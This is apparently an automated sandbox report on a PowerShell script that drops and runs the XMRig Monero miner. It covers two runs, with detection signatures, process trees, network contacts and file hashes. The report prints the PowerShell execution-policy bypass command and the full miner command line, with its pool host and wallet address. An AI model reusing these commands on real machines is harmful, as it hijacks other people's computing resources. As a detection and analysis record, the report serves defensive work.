memory/3752-60-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-61-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-62-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-63-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-64-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-65-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-66-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-67-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-68-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-69-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-70-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-71-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-72-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-73-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-74-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-75-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-76-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-77-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-78-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-79-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-80-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-81-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-82-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-83-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-84-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-85-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-86-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-87-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-88-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-89-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-90-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-91-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-92-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-93-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-94-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-95-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-96-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-97-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-98-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-99-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-100-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-101-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-102-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-103-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-104-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-105-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-106-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-107-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-108-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-109-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-110-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-111-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-112-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-113-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-114-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-115-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-116-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
Analysis: behavioral31
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 01:50
Platform
win10v2004-20240508-en
Max time kernel
1790s
Max time network
1780s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3300 wrote to memory of 4404 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3300 wrote to memory of 4404 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 11.173.189.20.in-addr.arpa | udp |
Files
memory/3300-0-0x00007FFFA3D03000-0x00007FFFA3D05000-memory.dmp
memory/3300-6-0x000002AA2A640000-0x000002AA2A662000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2dzgamsc.r3x.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3300-11-0x00007FFFA3D00000-0x00007FFFA47C1000-memory.dmp
memory/3300-12-0x00007FFFA3D00000-0x00007FFFA47C1000-memory.dmp
memory/3300-14-0x00007FFFA3D00000-0x00007FFFA47C1000-memory.dmp
memory/3300-15-0x000002AA2B150000-0x000002AA2B162000-memory.dmp
memory/3300-16-0x000002AA2A6C0000-0x000002AA2A6CA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4404-47-0x0000017911550000-0x0000017911570000-memory.dmp
memory/4404-48-0x0000017911590000-0x00000179115B0000-memory.dmp
memory/4404-49-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-51-0x00000179115D0000-0x00000179115F0000-memory.dmp
memory/4404-50-0x00000179115B0000-0x00000179115D0000-memory.dmp
memory/4404-52-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/3300-54-0x00007FFFA3D00000-0x00007FFFA47C1000-memory.dmp
memory/3300-53-0x00007FFFA3D03000-0x00007FFFA3D05000-memory.dmp
memory/4404-55-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/3300-56-0x00007FFFA3D00000-0x00007FFFA47C1000-memory.dmp
memory/4404-57-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-59-0x00000179115D0000-0x00000179115F0000-memory.dmp
memory/4404-58-0x00000179115B0000-0x00000179115D0000-memory.dmp
memory/4404-60-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-61-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-62-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-63-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-64-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-65-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-66-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-67-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-68-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-69-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-70-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-71-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-72-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-73-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-74-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-75-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-76-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-77-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-78-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-79-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-80-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-81-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-82-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-83-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-84-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-85-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-86-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-87-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-88-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-89-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-90-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-91-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-92-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-93-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-94-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-95-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-96-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-97-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-98-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-99-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-100-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-101-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-102-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-103-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-104-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-105-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-106-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-107-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-108-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-109-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-110-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-111-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-112-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-113-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-114-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-115-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-116-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-117-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-118-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
Analysis: behavioral8
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 01:24
Platform
win11-20240508-en
Max time kernel
1799s
Max time network
1801s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4440 wrote to memory of 2176 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4440 wrote to memory of 2176 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
Files
memory/4440-0-0x00007FFD4C3B3000-0x00007FFD4C3B5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_54bgl4sk.n1t.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4440-9-0x00000264FA280000-0x00000264FA2A2000-memory.dmp
memory/4440-10-0x00007FFD4C3B0000-0x00007FFD4CE72000-memory.dmp
memory/4440-11-0x00007FFD4C3B0000-0x00007FFD4CE72000-memory.dmp
memory/4440-12-0x00007FFD4C3B0000-0x00007FFD4CE72000-memory.dmp
memory/4440-14-0x00000264FA750000-0x00000264FA762000-memory.dmp
memory/4440-15-0x00000264FA2D0000-0x00000264FA2DA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/2176-46-0x00000191C2240000-0x00000191C2260000-memory.dmp
memory/2176-47-0x00000191C2280000-0x00000191C22A0000-memory.dmp
memory/2176-48-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-53-0x00000191C22C0000-0x00000191C22E0000-memory.dmp
memory/2176-52-0x00000191C22A0000-0x00000191C22C0000-memory.dmp
memory/4440-51-0x00007FFD4C3B0000-0x00007FFD4CE72000-memory.dmp
memory/2176-49-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/4440-50-0x00007FFD4C3B3000-0x00007FFD4C3B5000-memory.dmp
memory/2176-54-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-55-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-56-0x00000191C22A0000-0x00000191C22C0000-memory.dmp
memory/2176-57-0x00000191C22C0000-0x00000191C22E0000-memory.dmp
memory/2176-58-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-59-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-60-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-61-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-62-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-63-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-64-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-65-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-66-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-67-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-68-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-69-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-70-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-71-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-72-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-73-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-74-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-75-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-76-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-77-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-78-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-79-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-80-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-81-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-82-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-83-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-84-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-85-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-86-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-87-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-88-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-89-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-90-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-91-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-92-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-93-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-94-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-95-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-96-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
